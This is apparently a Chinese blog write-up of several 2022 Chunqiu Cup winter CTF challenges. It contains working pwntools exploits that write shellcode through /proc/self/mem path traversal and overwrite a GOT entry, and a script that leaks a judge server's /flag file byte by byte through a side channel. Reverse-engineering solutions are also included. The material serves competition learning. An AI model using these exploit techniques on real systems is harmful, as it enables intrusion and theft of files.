2022年春秋杯网络安全联赛冬季赛--部分赛题WP

已于 2023-01-12 19:01:15 修改
阅读量993 收藏 11
点赞数 3
分类专栏: 网络安全CTF 文章标签: 网络安全
于 2023-01-12 18:58:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xccwxy/article/details/128664878
版权

果然我还是只菜菜鸟

MISC

根据题目附件下载得到数据包流量,通过分析ftp流量发现keyisChunqiuGame00504

登陆操作系统后发现再/var/www/html/uploads/.index.php进行查看发现提示代码加密和root密码被aes加密,再根目录中发现tips的文件提示需要获取root密码拿flag

Php代码混淆解密发现AES加密

通过对aes解密获得root密码:

登陆root用户获取flag

reindeer game

玩游戏得flag签到

楠之勇者传

根据题目tips得到思路编写如下脚本:

from pwn import *

import time

from base64 import b64encode

io  = remote()

context(log_level='debug',arch='amd64')

def gq():

    io.sendline('1')

    io.recvuntil('血量:')

    xl = io.recvline()[:-1]

    io.recvuntil('金币:')

    jb = io.recvline()[:-1]

    time.sleep(0.1)

    io.sendline('x')

    io.recv()

    return xl,jb

def up():

    io.sendline('4')

    time.sleep(0.1)

    io.sendline('')

def gos(id):

    io.sendline('3')

    io.sendline(str(id))

    io.sendline('a')

    io.sendline('')

io.sendline('name')

io.sendline('1')

io.recvuntil('你想去哪里?')

for i in range(30):

    up()

    print(i,io.recv())

    if int(gq()[1]) > 15:

        break

text = asm(shellcraft.sh())

b6 = b64encode(text)

sh_add = 0x518340

wirgot = 0x9B4D18

def add(offset,pay):

    io.sendline('2')

    io.sendline('1')

    p = '../proc/self/mem'

    io.sendline(p)

    io.sendline(str(offset))

    io.sendline(b64encode(pay))

    io.sendline('')

gos(1)

add(sh_add,text)

add(wirgot,p64(sh_add))

io.interactive()

运行得到flag

调查问卷

Reverse

脚本整体内容:

flag = [0]*106

flag[-1]  = '1'

flag[-2]  = '0'

flag[-3]  = '0'

flag[-4]  = '0'

flag[-5]  = '0'

flag[-6]  = '1'

flag[-7]  = '1'

flag[-8]  = '0'

flag[-9]  = '0'

flag[-10] = '0'

flag[-11] = '0'

flag[-12] = '0'

flag[-13] = '1'

flag[-14] = '1'

flag[-15] = '0'

flag[-16] = '0'

flag[-17] = '0'

flag[-18] = '1'

flag[-19] = '0'

flag[-20] = '0'

flag[-21] = '0'

flag[-22] = '1'

flag[-23] = '1'

flag[-24] = '0'

flag[-25] = '1'

flag[-26] = '1'

flag[-27] = '0'

flag[-28] = '0'

flag[-29] = '1'

flag[-30] = '1' # 70li bj

flag[-31] = '0'

flag[-32] = '0'

flag[-33] = '0'

flag[-34] = '0'

flag[-35] = '1'

flag[-36] = '0'

flag[-37] = '0'

flag[-38] = '1' # in 63 to

flag[-39] = '1'

flag[-40] = '0'

flag[-41] = '1'

flag[-42] = '0'

flag[-43] = '1'

flag[-44] = '0'

flag[-45] = '1'

flag[-46] = '1'

flag[-47] = '0'

flag[-48] = '0'

flag[-49] = '0'

flag[-50] = '0'

flag[-51] = '1'

flag[-52] = '0'

flag[-53] = '1'

flag[-54] = '1'

flag[-55] = '0'

flag[-56] = '0'

flag[-57] = '1'

flag[-58] = '1'

flag[-59] = '1'

flag[-60] = '0'

flag[-61] = '1'

flag[-62] = '1'

flag[-63] = '0'

flag[-64] = '0'

flag[-65] = '1'

flag[-66] = '1'

flag[-67] = '0'

flag[-68] = '0'

flag[-69] = '0'

flag[-70] = '1'

flag[-71] = '1'

flag[-72] = '0'

flag[-73] = '0'

flag[-74] = '1'

flag[-75] = '0' # 26

flag[-76] = '0'

flag[-77] = '0'

flag[-78] = '1'

flag[-79] = '1'

flag[-80] = '0'

flag[-81] = '0'

flag[-82] = '0'

flag[-83] = '0'

flag[-84] = '1'

flag[-85] = '1'

flag[-86] = '1'

flag[-87] = '0'

flag[-88] = '0'

flag[-89] = '1'

flag[-90] = '1'

flag[-91] = '1'

flag[-92] = '0' #x

flag[-93] = '1'

flag[-94] = '1'

flag[-95] = '0'

flag[-96] = '0'

flag[-97] = '1'

flag[-98] = '0'

flag[-99] = '1'

flag[-100] = '1'

flag[-101] = '0'

flag[-102] = '1'

flag[-103] = '0'

flag[-104] = '0'

flag[-105] = '1'

flag[-106] = '1'

x = ''.join(flag)

x = '10110000011100100111000001110010110100011001101001'[::-1] + x

x = '11001000110000101100101101000100011011101100011001'[::-1] + x

x = '10011001101011010011101100100111000010011001000110'[::-1] + x

x  = '11001100000011001100011001100110'[::-1] + x

print(bytes.fromhex(hex(int(x,2))[2:]))

#fc03bd97-ff7b-419f-8987-78bc745d3b0a

easy_python

人工智能直接修复代码YYDS

直接复制运行代码得flag

baby_transform

查考题目链接:https://lantern.cool/wp-games-2019aurora/#baby-transform

分析可得过程为:读取 flag 文件 -> 傅里叶变换 -> 输出到 enc 文件

Fourier_transform函数:

import numpy as np

from ctypes import *

import struct

import binascii

key = [3152.000000+0.000000j, 249.457940+-103.732431j, 167.947321+-51.471963j, 204.521483+-147.261613j, 230.141620+-71.496864j, -93.422845+67.286833j, -116.469618+-32.311604j, -76.000000+77.942286j, 203.522618+176.254494j, -7.942906+-82.496883j, 98.007332+246.562541j, 50.566807+-174.150591j, -12.160767+-24.696179j, -79.998821+129.516640j, 8.000000+136.832014j, -198.078578+-124.294134j, -6.013544+-65.789247j, -131.278276+114.225226j, -29.869615+-55.684908j, 136.675195+-120.613739j, -29.605346+-55.343269j, -4.000000+0.000000j, -29.605346+55.343269j, 136.675195+120.613739j, -29.869615+55.684908j, -131.278276+-114.225226j, -6.013544+65.789247j, -198.078578+124.294134j, 8.000000+-136.832014j, -79.998821+-129.516640j, -12.160767+24.696179j, 50.566807+174.150591j, 98.007332+-246.562541j, -7.942906+82.496883j, 203.522618+-176.254494j, -76.000000+-77.942286j, -116.469618+32.311604j, -93.422845+-67.286833j, 230.141620+71.496864j, 204.521483+147.261613j, 167.947321+51.471963j, 249.457940+103.732431j]

a = np.fft.ifft(key)

#print(a.real)

s =[102., 107.99999999, 97.00000005, 103.00000006, 122.99999999,

 100.99999995, 51.00000007, 50.00000002, 48.00000005, 99.99999992,

  51.00000009, 97.00000007, 96.99999996, 44.9999999, 54.99999999,

  97.99999994, 102.00000008, 48.00000006, 44.99999994, 52.00000013,

  98.00000004, 97.0000001, 48.99999988, 44.99999999, 98.00000004,

  47.99999996, 56.00000003, 47.99999998, 44.99999987, 101.99999988,

  55.00000003, 97.00000003, 102.00000007, 57.00000006, 49.99999997,

  56.00000003, 53.99999996, 50.00000001, 96.99999993, 50.99999995,

  98.99999997, 124.99999998]

s = map(int, map(round, s))#取整

print(''.join(map(chr, s)))

PWN

根据提示获取token,发现下面有脚本进行CV大法处理

最终脚本:

import os

import sys

import requests

import time

host,port = '47.104.129.38',10101

base_url = f'http://{host}:{port}'

token_url = f'{base_url}/getToken'

judge_url = f'{base_url}/judge'

def getToken():

    result = requests.post(token_url).json()

    # print(result)

    assert not result['error'], "System error"

    return result['data']['token']

token = getToken()

print(token)

def judge(chall:str, src:str, language:str = 'C'):

    data = {

        'src': src,

        'language': language,

        'action': chall,

        'token': token,

    }

    result = requests.post(judge_url, json = data).json()

    return result

flag = ''

for num in range(0,100):

    low = 32

    high = 127

    mid = (high + low) //2

    while(high > low):

        py = f"""

import time

a,b = map(int,input().split(' '))

f = list(open('/flag/flag','rb').read())

if f[{num}] < {mid}:

    print('ERERER')

print(a+b)

"""

        rl = judge('test',py,'PYTHON')

        if rl['data']=='SUCCESS':

            low =mid+1

        else:

            high=mid

        mid = (low+high)//2

    if mid == 127 or mid==32:

        break

    flag += chr(mid-1)

    print(flag)

print(flag)

Py的关卡方式:

import time

a,b = map(int,input().split(' '))

f = list(open('/flag/flag','rb').read())

if f[{num}] < {mid}:

    print('ERERER')

print(a+b)

得flag

work_pwn

Exp

from pwn import *

import time

io = remote('39.105.171.73',PORT)

context(log_level='debug')

io.recv()

io.sendline('3')

time.sleep(0.1)

io.sendline('3')

io.sendline('1')

time.sleep(0.1)

io.sendline('3')

time.sleep(0.1)

io.sendline('/flag')

time.sleep(0.1)

io.sendline('hh')

io.interactive()

Exp脚本运行得:

Web

Sentry_Shark
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第三届上海市大学生网络安全 i春秋CTF Web解题思路
曹振国的博客
05-01 1159
SOME WORDS1.发现SQL注入2.尝试SQLMap3.经实验发现过滤了"="和"and"reverse()函数flag总结 1.发现SQL注入 ?id=1 有数据 ?id=2 有数据 ?id=2-1 有数据 2.尝试SQLMap 发现报错: 3.经实验发现过滤了"=“和"and” 发现页面会返回错误信息,尝试报错注入: 用到函数:updatexml updatexml(目标xml内容,xml文档路径,更新的内容) 查询库名 ?id=updatexml(1,concat(0x7e,
2022第三届“网鼎网络安全(青龙组)部分题目附件
09-19
2022第三届“网鼎网络安全(青龙组)部分题目附件 2022第三届“网鼎网络安全(青龙组)部分题目附件 2022第三届“网鼎网络安全(青龙组)部分题目附件 2022第三届“网鼎”网络...
对于一些CTF比写的wp.zip
09-30
项目源码
[ CTF ] WriteUp-2022春秋网络安全联赛-冬季
ZXW_NUDT的博客
12-26 2311
2022春秋网络安全联赛-冬季
2024春秋冬季-部分赛题Wp_勒索流量ichunqiu,2024网络安全大厂面试集合
最新发布
2401_83621541的博客
04-17 818
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
2022春秋冬季-reindeer game(WP
m0_67381078的博客
12-30 312
pyinstxtractor.py 、uncompyle6的使用
2022春秋网络安全联赛-冬季RE部分题解
Todog的博客
12-25 1078
2022春秋网络安全联赛-冬季
2022春秋冬季-WriteUp By EDISEC】
qq_45603443的博客
12-29 889
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。
WP2022 春秋 Write Up
woodwhale的博客
12-27 1144
2022春秋部分题目的个人wp
2022金砖国家 网络安全项(样题)
12-19
通过本项目竞,使中职学生能熟练运用网络信息安全技术 对网络、操作系统、应用、服务器等目标进行信息和数据安全防 护与渗透,具有分析、处理现场安全问题的能力,促进学生团队 协作实践能力,引导中等职业学校...
第四届红帽网络安全-线上Writeup1
08-03
第四届红帽络安全-线上Writeup 第四届红帽络安全 - 线上 Writeup 第四届红帽络安全-线上Writeup 第四届红帽络安全-
2021“绿城网络安全
09-30
2021“绿城网络安全是一场聚焦网络安全技术的竞技活动,旨在提升参者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全的一种形式,参团队通过解决一系列...
2022第三届“网鼎网络安全(朱雀组)部分题目附件
09-11
2022第三届“网鼎网络安全(朱雀组)部分题目附件
2022春秋】两个题wp
weixin_51614272的博客
05-28 959
Mercy-code 无参数RCE,过滤了很多 解法一 <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|p
2022春秋网络安全联赛 冬季-wp
网安小菜鸡
01-17 294
2022春秋网络安全联赛 冬季-wp
春秋wp
qq_49354488的博客
03-11 455
签到 手写一个或者手机打一个FUN扫描一下就行 flag{ju5t_f0r_FUN} 问卷 做完就给 flag{xinnianfunfunfun} 十二宫的挑衅 我们搜一下十二宫密码 根据十二宫密码将图片内容进行排序 在用ZAD解密 flag{WUUHUUTAKEOFF} 十二宫密码破解 puzzle 是拼图 这是原图 打开另一个压缩包里面有1125张图片 ,我们吧带字的图片筛选出来然后照着对照就能得到flag 因为里面有很多重复的所以很好看 flag{w9w45my6x8kk4e
2022春秋网络安全联赛春季勇者山峰密码部分wp
mxx307的博客
05-08 2629
2022春秋网络安全联赛春季勇者山峰部分wp Crypto bob’s enc bob自己编写了一套加密算法,但是在加密的过程中,似乎混入了一些噪音,你能帮助他恢复出明文吗? 题目 #python2 from secret import * import random prime = 2141 print len(flag) flag = map(ord, flag) flag1 = flag[:21] flag2 = flag[21:] row = 64 def add(msg1, msg
2023春秋春季WP-REVERSE(AK)
m0_68757308的博客
05-19 1709
2023春秋春季WP-REVERSE(AK)
春秋CTF2022 WP
xczzhf的博客
05-08 3649
已经过了交wp的时间了,这里就不再详细写了,写个大概吧 WEB Mercy-code 无参数RCE,参考bytectf boring code https://blog.csdn.net/a3320315/article/details/102989485/ 简单的说就是想办法构造 ‘.’ 然后拿到文件名,show_source就能拿到flag,这里我用的是数学函数 picture convert flask的题,实际上是个命令注入,源码如下 import json from flask import F
2022优秀-Web服务器安全管理.pptx
11-14
2022优秀-Web服务器安全管理.pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值